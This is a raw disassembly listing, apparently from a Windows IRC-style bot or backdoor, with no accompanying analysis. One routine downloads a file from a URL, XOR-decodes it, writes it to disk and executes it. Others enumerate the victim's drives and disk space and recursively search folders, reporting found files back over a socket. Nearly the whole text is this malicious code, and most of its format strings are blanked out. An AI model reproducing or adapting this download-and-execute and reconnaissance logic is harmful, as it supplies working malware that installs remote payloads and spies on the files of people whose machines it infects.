; ---------------------------------------------------------------------------
loc_418E91: ; CODE XREF: sub_418CEA+10B�j
mov eax, [ebp+74h+var_8]
cdq
push edx
push eax
call sub_419443
push eax
lea eax, [ebp+74h+var_1B8]
push eax
lea eax, [ebp+74h+var_1A4]
push eax
lea eax, [ebp+74h+var_4C4]
push offset asc_436D34 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
loc_418EBF: ; CODE XREF: sub_418CEA+DA�j
cmp [ebp+74h+var_14], ebx
jnz short loc_418EE1
push ebx ; int
push [ebp+74h+var_18] ; int
lea eax, [ebp+74h+var_4C4]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_1C0] ; int
call sub_40123B
add esp, 14h
loc_418EE1: ; CODE XREF: sub_418CEA+1D8�j
lea eax, [ebp+74h+var_4C4]
push eax
call sub_417D70
cmp [ebp+74h+File], ebx
pop ecx
jz short loc_418EFC
push [ebp+74h+File] ; File
call _fclose
pop ecx
loc_418EFC: ; CODE XREF: sub_418CEA+207�j
cmp [ebp+74h+arg_0], ebx
jbe short loc_418F0A
push [ebp+74h+arg_0]
call dword_444218 ; closesocket
loc_418F0A: ; CODE XREF: sub_418CEA+215�j
push [ebp+74h+var_1C]
call sub_40B149
pop ecx
push ebx
loc_418F14: ; CODE XREF: sub_418CEA+1A2�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_418CEA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418F1B proc near ; CODE XREF: sub_418F38+11D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_418F37
loc_418F27: ; CODE XREF: sub_418F1B+1A�j
mov dl, byte_43C08C
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_418F27
locret_418F37: ; CODE XREF: sub_418F1B+A�j
retn
sub_418F1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_418F38 proc near ; DATA XREF: sub_40274D+5F78�o
; sub_40274D+6799�o
var_604 = qword ptr -604h
var_5F8 = qword ptr -5F8h
Dst = byte ptr -514h
var_314 = dword ptr -314h
Str = byte ptr -310h
var_290 = byte ptr -290h
var_190 = byte ptr -190h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_6C = dword ptr -6Ch
var_60 = dword ptr -60h
var_40 = dword ptr -40h
var_3C = word ptr -3Ch
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Memory = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 514h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0AAh
lea edi, [ebp+74h+var_314]
rep movsd
xor esi, esi
push esi
push esi
xor edi, edi
push esi
inc edi
mov [eax+2A4h], edi
push esi
lea eax, [ebp+74h+var_290]
push eax
push dword_444254
call dword_444108 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+74h+var_10], eax
jz loc_4193C2
push esi
push esi
push 2
push esi
push esi
push 40000000h
lea eax, [ebp+74h+var_190]
push eax
call ds:dword_42B08C ; CreateFileA
cmp eax, edi
mov [ebp+74h+var_14], eax
jnb short loc_418FFE
lea eax, [ebp+74h+var_190]
push eax
lea eax, [ebp+74h+Dst]
push offset asc_436F84 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_78], esi
jnz short loc_418FE4
push esi ; int
push [ebp+74h+var_74] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_314] ; int
call sub_40123B
add esp, 14h
loc_418FE4: ; CODE XREF: sub_418F38+8A�j
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
push [ebp+74h+var_90]
call sub_40B149
pop ecx
jmp loc_419420
; ---------------------------------------------------------------------------
loc_418FFE: ; CODE XREF: sub_418F38+6A�j
xor edi, edi
call ds:dword_42B038 ; GetTickCount
mov ebx, 7D000h
push ebx ; Size
mov [ebp+74h+var_4], eax
call _malloc
pop ecx
mov [ebp+74h+Memory], eax
loc_419018: ; CODE XREF: sub_418F38+1A8�j
push 200h ; Size
lea eax, [ebp+74h+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+74h+arg_0]
push eax
push 200h
lea eax, [ebp+74h+Dst]
push eax
push [ebp+74h+var_10]
call dword_4441B8 ; InternetReadFile
cmp [ebp+74h+var_7C], esi
jz short loc_41905C
push [ebp+74h+arg_0]
lea eax, [ebp+74h+Dst]
push eax
call sub_418F1B
pop ecx
pop ecx
loc_41905C: ; CODE XREF: sub_418F38+111�j
push esi
lea eax, [ebp+74h+var_18]
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+Dst]
push eax
push [ebp+74h+var_14]
call ds:dword_42B084 ; WriteFile
cmp edi, ebx
jnb short loc_41909A
mov eax, ebx
sub eax, edi
cmp eax, [ebp+74h+arg_0]
jbe short loc_419084
mov eax, [ebp+74h+arg_0]
loc_419084: ; CODE XREF: sub_418F38+147�j
push eax ; Size
lea eax, [ebp+74h+Dst]
push eax ; Src
mov eax, [ebp+74h+Memory]
add eax, edi
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_41909A: ; CODE XREF: sub_418F38+13E�j
add edi, [ebp+74h+arg_0]
cmp [ebp+74h+var_84], esi
jz short loc_4190A7
cmp edi, [ebp+74h+var_84]
ja short loc_4190E6
loc_4190A7: ; CODE XREF: sub_418F38+168�j
mov eax, edi
shr eax, 0Ah
push eax
lea eax, [ebp+74h+var_290]
push eax
mov eax, [ebp+74h+var_90]
imul eax, 234h
add eax, offset dword_4442E8
cmp [ebp+74h+var_8C], 1
jz short loc_4190CF
push offset unk_436F5C
jmp short loc_4190D4
; ---------------------------------------------------------------------------
loc_4190CF: ; CODE XREF: sub_418F38+18E�j
push offset asc_436F34 ; "-"
loc_4190D4: ; CODE XREF: sub_418F38+195�j
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+74h+arg_0], esi
ja loc_419018
loc_4190E6: ; CODE XREF: sub_418F38+16D�j
cmp [ebp+74h+var_84], esi
mov [ebp+74h+var_8], 1
jz short loc_41913B
cmp edi, [ebp+74h+var_84]
jz short loc_41913B
push [ebp+74h+var_84]
lea eax, [ebp+74h+Dst]
push edi
push offset asc_436F08 ; "-"
push eax ; Dest
mov [ebp+74h+var_8], esi
call _sprintf
push esi ; int
push [ebp+74h+var_74] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_314] ; int
call sub_40123B
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
add esp, 28h
loc_41913B: ; CODE XREF: sub_418F38+1B8�j
; sub_418F38+1BD�j
call ds:dword_42B038 ; GetTickCount
sub eax, [ebp+74h+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+74h+var_14]
mov ecx, eax
inc ecx
mov eax, edi
div ecx
mov ebx, eax
call ds:dword_42B004 ; CloseHandle
push [ebp+74h+Memory] ; Memory
call _free
cmp [ebp+74h+var_80], esi
pop ecx
jz short loc_4191C5
lea eax, [ebp+74h+var_190]
push eax ; char *
call sub_40109F
cmp eax, [ebp+74h+var_80]
pop ecx
jz short loc_4191C5
push [ebp+74h+var_80]
mov [ebp+74h+var_8], esi
push eax
lea eax, [ebp+74h+Dst]
push offset asc_436EE0 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
push [ebp+74h+var_74] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_314] ; int
call sub_40123B
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
add esp, 28h
loc_4191C5: ; CODE XREF: sub_418F38+235�j
; sub_418F38+247�j
cmp [ebp+74h+var_8], esi
jz loc_41940F
cmp [ebp+74h+var_8C], 1
jz loc_4192CE
test ebx, ebx
mov [ebp+74h+var_4], ebx
fild [ebp+74h+var_4]
jge short loc_4191E8
fadd ds:dbl_433200
loc_4191E8: ; CODE XREF: sub_418F38+2A8�j
test edi, edi
fmul ds:dbl_436ED8
push ecx
push ecx
fstp [esp+584h+var_5F8]
lea eax, [ebp+74h+var_190]
mov [ebp+74h+var_4], edi
fild [ebp+74h+var_4]
push eax
jge short loc_41920A
fadd ds:dbl_433200
loc_41920A: ; CODE XREF: sub_418F38+2CA�j
fmul ds:dbl_436ED8
push ecx
push ecx
lea eax, [ebp+74h+Dst]
fstp [esp+590h+var_604]
push offset asc_436EA0 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+74h+var_78], esi
jnz short loc_41924E
push esi ; int
push [ebp+74h+var_74] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_314] ; int
call sub_40123B
add esp, 14h
loc_41924E: ; CODE XREF: sub_418F38+2F4�j
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
cmp [ebp+74h+var_88], 1
pop ecx
jnz loc_41940F
push 5
push esi
push esi
lea eax, [ebp+74h+var_190]
push eax
push offset aOpen ; "open"
push esi
call dword_444214
cmp [ebp+74h+var_78], esi
jnz loc_41940F
lea eax, [ebp+74h+var_190]
push eax
lea eax, [ebp+74h+Dst]
push offset asc_436E84 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
push [ebp+74h+var_74] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_314] ; int
call sub_40123B
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
add esp, 24h
jmp loc_41940F
; ---------------------------------------------------------------------------
loc_4192CE: ; CODE XREF: sub_418F38+29A�j
test ebx, ebx
mov [ebp+74h+var_4], ebx
fild [ebp+74h+var_4]
jge short loc_4192DE
fadd ds:dbl_433200
loc_4192DE: ; CODE XREF: sub_418F38+39E�j
test edi, edi
fmul ds:dbl_436ED8
push ecx
push ecx
fstp [esp+584h+var_5F8]
lea eax, [ebp+74h+var_190]
mov [ebp+74h+var_4], edi
fild [ebp+74h+var_4]
push eax
jge short loc_419300
fadd ds:dbl_433200
loc_419300: ; CODE XREF: sub_418F38+3C0�j
fmul ds:dbl_436ED8
push ecx
push ecx
lea eax, [ebp+74h+Dst]
fstp [esp+590h+var_604]
push offset asc_436E40 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+74h+var_78], esi
jnz short loc_419344
push esi ; int
push [ebp+74h+var_74] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_314] ; int
call sub_40123B
add esp, 14h
loc_419344: ; CODE XREF: sub_418F38+3EA�j
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
push 10h ; Size
lea eax, [ebp+74h+var_28]
push esi ; Val
push eax ; Dst
call _memset
push 44h
pop edi
push edi ; Size
lea eax, [ebp+74h+var_6C]
push esi ; Val
push eax ; Dst
call _memset
add esp, 1Ch
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_6C]
push eax
push esi
push esi
push 28h
push esi
push esi
mov [ebp+74h+var_6C], edi
push esi
lea eax, [ebp+74h+var_190]
xor edi, edi
push eax
inc edi
push esi
mov [ebp+74h+var_60], offset byte_42B633
mov [ebp+74h+var_40], edi
mov [ebp+74h+var_3C], si
call ds:dword_42B008 ; CreateProcessA
cmp eax, edi
jnz short loc_4193B4
call dword_444224 ; WSACleanup
call sub_41AEDD
push esi
call ds:dword_42B000 ; ExitProcess
loc_4193B4: ; CODE XREF: sub_418F38+468�j
lea eax, [ebp+74h+var_190]
push eax
push offset unk_436E0C
jmp short loc_4193CE
; ---------------------------------------------------------------------------
loc_4193C2: ; CODE XREF: sub_418F38+47�j
lea eax, [ebp+74h+var_290]
push eax
push offset asc_436DE0 ; "-"
loc_4193CE: ; CODE XREF: sub_418F38+488�j
lea eax, [ebp+74h+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_78], esi
jnz short loc_419402
push esi ; int
push [ebp+74h+var_74] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_314] ; int
call sub_40123B
add esp, 14h
loc_419402: ; CODE XREF: sub_418F38+4A8�j
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
pop ecx
loc_41940F: ; CODE XREF: sub_418F38+290�j
; sub_418F38+327�j ...
push [ebp+74h+var_10]
call dword_444164 ; InternetCloseHandle
push [ebp+74h+var_90]
call sub_40B149
loc_419420: ; CODE XREF: sub_418F38+C1�j
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_418F38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419429 proc near ; CODE XREF: sub_40274D+5554�p
; sub_40274D+5693�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_42065F
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_419429 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419443 proc near ; CODE XREF: sub_412135+462�p
; sub_412135+5FE�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 32h ; Size
push 0 ; Val
mov edi, offset dword_4DA12C
push edi ; Dst
call _memset
add esp, 0Ch
lea esi, [ebp+var_40]
push ebx
loc_419465: ; CODE XREF: sub_419443+52�j
; sub_419443+58�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call __aulldvrm
add cl, 30h
mov [esi], cl
inc esi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_41949D
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_419465
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_419465
; ---------------------------------------------------------------------------
loc_41949D: ; CODE XREF: sub_419443+42�j
mov eax, edi
pop ebx
jmp short loc_4194A7
; ---------------------------------------------------------------------------
loc_4194A2: ; CODE XREF: sub_419443+6A�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_4194A7: ; CODE XREF: sub_419443+5D�j
dec esi
lea ecx, [ebp+var_40]
cmp esi, ecx
jnb short loc_4194A2
mov byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
leave
retn
sub_419443 endp
; =============== S U B R O U T I N E =======================================
sub_4194B8 proc near ; CODE XREF: sub_419664+40�p
; sub_419664+76�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_44407C ; GetDriveTypeA
sub eax, 0
jz short loc_4194FB
dec eax
jz short loc_4194F5
dec eax
dec eax
jz short loc_4194EF
dec eax
jz short loc_4194E9
dec eax
jz short loc_4194E3
dec eax
jz short loc_4194DD
mov eax, offset dword_436FD8
retn
; ---------------------------------------------------------------------------
loc_4194DD: ; CODE XREF: sub_4194B8+1D�j
mov eax, offset off_436FD4
retn
; ---------------------------------------------------------------------------
loc_4194E3: ; CODE XREF: sub_4194B8+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_4194E9: ; CODE XREF: sub_4194B8+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_4194EF: ; CODE XREF: sub_4194B8+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_4194F5: ; CODE XREF: sub_4194B8+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4194FB: ; CODE XREF: sub_4194B8+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_4194B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419501 proc near ; CODE XREF: sub_419549+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4440FC
test eax, eax
jz short loc_419536
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_419536: ; CODE XREF: sub_419501+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_419501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419549 proc near ; CODE XREF: sub_419664+17�p
; sub_41D779+1C2�p
Dest = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_419501
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_419621
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_419621
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_419621
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call __alldiv
push edx
push eax
call sub_419443
push eax
mov edi, offset aSkb ; "%sKB"
push edi ; Format
mov esi, 80h
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call __alldiv
push edx
push eax
call sub_419443
push eax
push edi ; Format
lea eax, [ebp+var_130]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call __alldiv
push edx
push eax
call sub_419443
push eax
push edi ; Format
lea eax, [ebp+var_B0]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
pop ebx
jmp short loc_419650
; ---------------------------------------------------------------------------
loc_419621: ; CODE XREF: sub_419549+2C�j
; sub_419549+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+Dest]
push esi ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+var_130]
push esi ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+var_B0]
push esi ; Format
push eax ; Dest
call _sprintf
add esp, 18h
loc_419650: ; CODE XREF: sub_419549+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+Dest]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_419549 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419664(int,char *Str,int,int)
sub_419664 proc near ; CODE XREF: sub_419725+D�j
; sub_419725+51�p
var_500 = byte ptr -500h
Dest = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
Str1 = byte ptr -80h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_419549
push 60h
pop ecx
mov esi, eax
lea eax, [ebp+Str1]
push offset aFailed ; "failed"
lea edi, [ebp+var_180]
push eax ; Str1
rep movsd
call _strcmp
add esp, 10h
test eax, eax
jnz short loc_4196C6
push ebx
push ebx
call sub_4194B8
pop ecx
push eax
push offset asc_437028 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_4196FA
; ---------------------------------------------------------------------------
loc_4196C6: ; CODE XREF: sub_419664+3C�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+Str1]
push eax
push ebx
push ebx
call sub_4194B8
pop ecx
push eax
push offset asc_436FEC ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 20h
loc_4196FA: ; CODE XREF: sub_419664+60�j
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_419664 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419725(int,char *Str,int,int)
sub_419725 proc near ; CODE XREF: sub_40274D+2360�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_419737
pop ebx
pop ebp
jmp sub_419664
; ---------------------------------------------------------------------------
loc_419737: ; CODE XREF: sub_419725+9�j
push esi
push edi
push ebx
push ebx
call dword_4441A8 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi ; Size
call _malloc
pop ecx
mov edi, eax
push edi
push esi
call dword_4441A8 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_41978D
loc_41975B: ; CODE XREF: sub_419725+66�j
push offset aA_1 ; "A:\\"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_41977E
push esi ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_419664
add esp, 10h
loc_41977E: ; CODE XREF: sub_419725+45�j
push esi ; Str
call _strlen
lea esi, [esi+eax+1]
cmp [esi], bl
pop ecx
jnz short loc_41975B
loc_41978D: ; CODE XREF: sub_419725+34�j
push edi ; Memory
call _free
pop ecx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419725 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419799(int,char *Str,int,int,int,int)
sub_419799 proc near ; CODE XREF: sub_419799+9E�p
; sub_4198EB+BB�p
var_54C = dword ptr -54Ch
var_34C = dword ptr -34Ch
Dest = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
push [ebp+arg_10]
mov esi, 104h
push offset aS_4 ; "%s\\*"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
mov edi, ds:dword_42B0B4
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_0 ; "%s\\%s"
jz short loc_419856
loc_4197E5: ; CODE XREF: sub_419799+BB�j
test [ebp+var_144], 10h
jz short loc_419842
cmp [ebp+var_118], 2Eh
jnz short loc_419809
cmp [ebp+var_117], 0
jz short loc_419842
cmp [ebp+var_117], 2Eh
jz short loc_419842
loc_419809: ; CODE XREF: sub_419799+5C�j
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_34C]
push ebx ; Format
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+arg_14] ; int
lea eax, [ebp+var_34C]
push eax ; int
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_419799
add esp, 2Ch
mov [ebp+arg_14], eax
loc_419842: ; CODE XREF: sub_419799+53�j
; sub_419799+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jnz short loc_4197E5
loc_419856: ; CODE XREF: sub_419799+4A�j
push [ebp+var_4]
call ds:dword_42B0A4 ; FindClose
push [ebp+arg_C]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push ebx ; Format
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4198DC
loc_41988D: ; CODE XREF: sub_419799+141�j
inc [ebp+arg_14]
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_54C]
push offset asc_437068 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+var_54C]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jnz short loc_41988D
loc_4198DC: ; CODE XREF: sub_419799+F2�j
push esi
call ds:dword_42B0A4 ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_419799 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4198EB proc near ; DATA XREF: sub_40274D+6585�o
Dest = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = dword ptr -218h
var_115 = byte ptr -115h
Str = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 49Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0A7h
lea edi, [ebp+74h+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+74h+Str]
push eax ; Str
call _strlen
xor ebx, ebx
cmp [ebp+eax+74h+var_115], 5Ch
pop ecx
jnz short loc_419942
lea eax, [ebp+74h+Str]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+74h+var_115], bl
loc_419942: ; CODE XREF: sub_4198EB+41�j
lea eax, [ebp+74h+var_218]
push eax
push offset asc_4370AC ; "-"
lea eax, [ebp+74h+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+74h+var_8], ebx
jnz short loc_419987
push ebx ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_298]
push eax ; Str
push [ebp+74h+var_29C] ; int
call sub_40123B
add esp, 14h
loc_419987: ; CODE XREF: sub_4198EB+7A�j
push ebx ; int
lea eax, [ebp+74h+Str]
push eax ; int
lea eax, [ebp+74h+var_218]
push eax ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+var_298]
push eax ; Str
push [ebp+74h+var_29C] ; int
call sub_419799
push eax
lea eax, [ebp+74h+Dest]
push offset asc_43708C ; "-"
push eax ; Dest
call _sprintf
add esp, 24h
cmp [ebp+74h+var_8], ebx
jnz short loc_4199E5
push ebx ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_298]
push eax ; Str
push [ebp+74h+var_29C] ; int
call sub_40123B
add esp, 14h
loc_4199E5: ; CODE XREF: sub_4198EB+D8�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_10]
call sub_40B149
pop ecx
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_4198EB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419A03 proc near ; CODE XREF: sub_419FFD+AB�p
String = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_42B0E8
push edi
mov ebx, 100h
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_42B0E4
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_4DA960
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
